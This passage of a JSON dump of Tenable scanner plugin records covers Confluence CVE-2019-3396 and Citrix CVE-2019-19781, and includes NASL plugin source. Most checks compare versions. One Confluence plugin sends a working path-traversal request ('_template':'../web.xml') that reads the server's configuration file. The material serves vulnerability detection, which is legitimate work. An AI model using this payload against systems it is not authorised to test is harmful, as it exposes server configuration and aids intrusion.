severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, rep_version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:20:47", "description": "According to the tests performed by Nessus, the remote host is affected by the following vulnerability:\n\n - A server-side template injection exists in the Widget Connector due to improper input validation. An attacker can exploit this, via unspecified vectors, to traverse directories or execute arbitrary code. (CVE-2019-3396)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-11T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Template Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3396"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE-2019-3396.NASL", "href": "https://www.tenable.com/plugins/nessus/124004", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124004);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2019-3396\");\n script_xref(name:\"IAVA\", value:\"2019-A-0135-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Template Injection\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by\na template injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the tests performed by Nessus, the remote host\nis affected by the following vulnerability:\n\n - A server-side template injection exists in the Widget\n Connector due to improper input validation. An attacker\n can exploit this, via unspecified vectors, to traverse\n directories or execute arbitrary code. (CVE-2019-3396)\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8e8304c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 6.6.12, 6.12.3, 6.13.3,\n6.14.2, 6.15.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-3396\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Confluence File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence Widget Connector Macro Velocity Template Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp_name = 'confluence';\n\nport = get_http_port(default:8090);\n\napp_info = vcf::get_app_info(app:app_name, port:port, webapp:true);\npath = app_info['path'];\nif(path[strlen(path)-1] != '/') path += '/';\n\nitem = path + 'rest/tinymce/1/macro/preview';\nheader = {'Content-Type':'application/json','User-Agent':''};\ndata = '{\"contentId\":\"1337\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":' +\n '{\"url\":\"http://localhost//www.youtube.com/watch?v=w0gtNxBWIEY\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}';\n\nres = http_send_recv3(method:'POST', item:item, port:port, add_headers:header, data:data, exit_on_fail:TRUE);\n\nif('</web-app>' >< res[2])\n security_report_v4(severity:SECURITY_HOLE, port:port, generic:TRUE, request:[http_last_sent_request()]);\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Atlassian Confluence', build_url(qs:path, port:port));\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-13T16:05:13", "description": "The Widget Connector macro in Atlassian Confluence Server before version 6.6.12, 6.7.0 < 6.12.3, 6.13.0 < 6.13.3 and 6.14.0 < 6.14.2 allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.\n\nThis vulnerability has been verified using a remote check and should be remediated immediately.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-30T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Template Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3396"], "modified": "2021-09-07T00:00:00", "cpe": [], "id": "WEB_APPLICATION_SCANNING_98613", "href": "https://www.tenable.com/plugins/was/98613", "sourceData": "No source data", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:25:08", "description": "Art Manion and Will Dormann report :\n\nBy using an older and less-secure form of open(), it is possible for untrusted template files to cause reads/writes outside of the template directories. This vulnerability is a component of the recent Citrix exploit.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-15T00:00:00", "type": "nessus", "title": "FreeBSD : Template::Toolkit -- Directory traversal on write (2bab995f-36d4-11ea-9dad-002590acae31)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2022-02-25T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:p5-Template-Toolkit", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "href": "https://www.tenable.com/plugins/nessus/132879", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(132879);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/25\");\n\n script_cve_id(\"CVE-2019-19781\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"FreeBSD : Template::Toolkit -- Directory traversal on write (2bab995f-36d4-11ea-9dad-002590acae31)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Art Manion and Will Dormann report :\n\nBy using an older and less-secure form of open(), it is possible for\nuntrusted template files to cause reads/writes outside of the template\ndirectories. This vulnerability is a component of the recent Citrix\nexploit.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kb.cert.org/vuls/id/619785/\"\n );\n # https://vuxml.freebsd.org/freebsd/2bab995f-36d4-11ea-9dad-002590acae31.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e74959bf\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Citrix ADC (NetScaler) Directory Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:p5-Template-Toolkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"p5-Template-Toolkit<3.004\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:16:55", "description": "The remote Citrix ADC or Citrix NetScaler Gateway device is affected by an arbitrary code execution vulnerability. An unauthenticated, remote attacker may be able to leverage this vulnerability to perform arbitrary code execution on an affected host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-22T00:00:00", "type": "nessus", "title": "Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-22T00:00:00", "cpe": ["cpe:2.3:o:citrix:netscaler_access_gateway_firmware:*:*:*:*:*:*:*:*"], "id": "701262.PRM", "href": "https://www.tenable.com/plugins/nnm/701262", "sourceData": "Binary data 701262.prm", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T17:26:49", "description": "The version of Citrix ADC or Citrix NetScaler Gateway SSL VPN running on the remote web server is affected by a path traversal vulnerability that can lead to remote code execution. An unauthenticated, remote attacker can exploit this issue, by sending a specially crafted HTTP request to perform a path traversal that can lead to acheiving remote code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-09T00:00:00", "type": "nessus", "title": "Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027) (Direct Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-19T00:00:00", "cpe": ["cpe:/o:citrix:netscaler_access_gateway_firmware"], "id": "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "href": "https://www.tenable.com/plugins/nessus/132752", "sourceData": "Binary data citrix_ssl_vpn_CVE-2019-19781.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T17:02:06", "description": "The remote Citrix ADC or Citrix NetScaler Gateway device is affected by an arbitrary code execution vulnerability.\nAn unauthenticated, remote attacker may be able to leverage this vulnerability to perform arbitrary code execution on an affected host.\n\nPlease refer to advisory CTX267027 for more information.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-12-24T00:00:00", "type": "nessus", "title": "Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2022-02-25T00:00:00", "cpe": ["cpe:/o:citrix:netscaler_access_gateway_firmware"], "id": "CITRIX_NETSCALER_CTX267027.NASL", "href": "https://www.tenable.com/plugins/nessus/132397", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132397);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/25\");\n\n script_cve_id(\"CVE-2019-19781\");\n script_xref(name:\"IAVA\", value:\"2020-A-0001-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an arbitrary code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Citrix ADC or Citrix NetScaler Gateway device is affected by an arbitrary code execution vulnerability.\nAn unauthenticated, remote attacker may be able to leverage this vulnerability to perform arbitrary code execution on \nan affected host.\n\nPlease refer to advisory CTX267027 for more information.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.citrix.com/article/CTX267027\");\n script_set_attribute(attribute:\"solution\", value:\n\"For versions 10.5.x, 11.1.x, 12.0.x, 12.1.x and 13.0.x, upgrade to 10.5.70.12, 11.1.63.15, 12.0.63.13, 12.1.55.18 and \n13.0.47.24 respectively.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19781\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Citrix ADC (NetScaler) Directory Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:citrix:netscaler_access_gateway_firmware\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"citrix_netscaler_detect.nbin\");\n script_require_keys(\"Host/NetScaler/Detected\");\n\n exit(0);\n}\ninclude('vcf_extras_netscaler.inc');\n\nvar app_info = vcf::citrix_netscaler::get_app_info();\n\nvar constraints = [\n {'min_version': '10.5', 'fixed_version': '10.5.70.12', 'fixed_display': '10.5-70.12'},\n {'min_version': '11.1', 'fixed_version': '11.1.63.15', 'fixed_display': '11.1-63.15'},\n {'min_version': '12.0', 'fixed_version': '12.0.63.13', 'fixed_display': '12.0-63.13'},\n {'min_version': '12.1', 'fixed_version': '12.1.55.18', 'fixed_display': '12.1-55.18'},\n {'min_version': '13.0', 'fixed_version': '13.0.47.24', 'fixed_display': '13.0-47.24'}\n];\n\nvcf::citrix_netscaler::check_version_and_report(\n app_info: app_info,\n constraints: constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:27:12", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.6.12, 6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 6.14.x prior to 6.14.2. It is, therefore, affected by the following vulnerabilities:\n\n - A server-side request forgery (SSRF) exists in the WebDAV plugin due to improper input validation. An attacker can exploit this, via unspecified vectors, to send arbitrary HTTP and WebDAV requests from the application. (CVE-2019-3395)\n - A server-side template injection exists in the Widget Connector due to improper input validation. An attacker can exploit this, via unspecified vectors, to traverse directories or execute arbitrary code. (CVE-2019-3396)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-02T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3396", "CVE-2019-3395"], "modified": "2019-05-02T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "700661.PRM", "href": "https://www.tenable.com/plugins/nnm/700661", "sourceData": "Binary data 700661.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-13T16:15:24", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.6.12, 6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 6.14.x prior to 6.14.2. It is, therefore, affected by the following vulnerabilities :\n\n - A server-side request forgery (SSRF) exists in the WebDAV plugin due to improper input validation. An attacker can exploit this, via unspecified vectors, to send arbitrary HTTP and WebDAV requests from the application. (CVE-2019-3395)\n\n - A server-side template injection exists in the Widget Connector due to improper input validation. An attacker can exploit this, via unspecified vectors, to traverse directories or execute arbitrary code. (CVE-2019-3396)\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-07-17T00:00:00", "type": "nessus", "title": "Atlassian Confluence 6.14.x < 6.14.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3395", "CVE-2019-3396"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98638", "href": "https://www.tenable.com/plugins/was/98638", "sourceData": "No source data", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-13T16:15:25", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.6.12, 6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 6.14.x prior to 6.14.2. It is, therefore, affected by the following vulnerabilities :\n\n - A server-side request forgery (SSRF) exists in the WebDAV plugin due to improper input validation. An attacker can exploit this, via unspecified vectors, to send arbitrary HTTP and WebDAV requests from the application. (CVE-2019-3395)\n\n - A server-side template injection exists in the Widget Connector due to improper input validation. An attacker can exploit this, via unspecified vectors, to traverse directories or execute arbitrary code. (CVE-2019-3396)\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-07-17T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.6.12 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3395", "CVE-2019-3396"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98641", "href": "https://www.tenable.com/plugins/was/98641", "sourceData": "No source data", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-13T16:15:25", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.6.12, 6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 6.14.x prior to 6.14.2. It is, therefore, affected by the following vulnerabilities :\n\n - A server-side request forgery (SSRF) exists in the WebDAV plugin due to improper input validation. An attacker can exploit this, via unspecified vectors, to send arbitrary HTTP and WebDAV requests from the application. (CVE-2019-3395)\n\n - A server-side template injection exists in the Widget Connector due to improper input validation. An attacker can exploit this, via unspecified vectors, to traverse directories or execute arbitrary code. (CVE-2019-3396)\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-07-17T00:00:00", "type": "nessus", "title": "Atlassian Confluence 6.13.x < 6.13.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3395", "CVE-2019-3396"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98639", "href": "https://www.tenable.com/plugins/was/98639", "sourceData": "No source data", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-13T16:15:24", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.6.12, 6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 6.14.x prior to 6.14.2. It is, therefore, affected by the following vulnerabilities :\n\n - A server-side request forgery (SSRF) exists in the WebDAV plugin due to improper input validation. An attacker can exploit this, via unspecified vectors, to send arbitrary HTTP and WebDAV requests from the application. (CVE-2019-3395)\n\n - A server-side template injection exists in the Widget Connector due to improper input validation. An attacker can exploit this, via unspecified vectors, to traverse directories or execute arbitrary code. (CVE-2019-3396)\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-07-17T00:00:00", "type": "nessus", "title": "Atlassian Confluence 6.7.x < 6.12.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3395", "CVE-2019-3396"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98640", "href": "https://www.tenable.com/plugins/was/98640", "sourceData": "No source data", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:17:12", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.6.12, 6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 6.14.x prior to 6.14.2. It is, therefore, affected by the following vulnerabilities :\n\n - A server-side request forgery (SSRF) exists in the WebDAV plugin due to improper input validation. An attacker can exploit this, via unspecified vectors, to send arbitrary HTTP and WebDAV requests from the application. (CVE-2019-3395)\n\n - A server-side template injection exists in the Widget Connector due to improper input validation. An attacker can exploit this, via unspecified vectors, to traverse directories or execute arbitrary code. (CVE-2019-3396)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-03-22T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3395", "CVE-2019-3396"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_6_6_12.NASL", "href": "https://www.tenable.com/plugins/nessus/123008", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123008);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2019-3395\", \"CVE-2019-3396\");\n script_bugtraq_id(107543);\n script_xref(name:\"IAVA\", value:\"2019-A-0135-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian\nConfluence application running on the remote host is prior to 6.6.12,\n6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 6.14.x prior to\n6.14.2. It is, therefore, affected by the following vulnerabilities :\n\n - A server-side request forgery (SSRF) exists in the\n WebDAV plugin due to improper input validation. An\n attacker can exploit this, via unspecified vectors, to\n send arbitrary HTTP and WebDAV requests from the\n application. (CVE-2019-3395)\n\n - A server-side template injection exists in the Widget\n Connector due to improper input validation. An attacker\n can exploit this, via unspecified vectors, to traverse\n directories or execute arbitrary code. (CVE-2019-3396)\n\nNote that Nessus has not tested for this issue but has instead 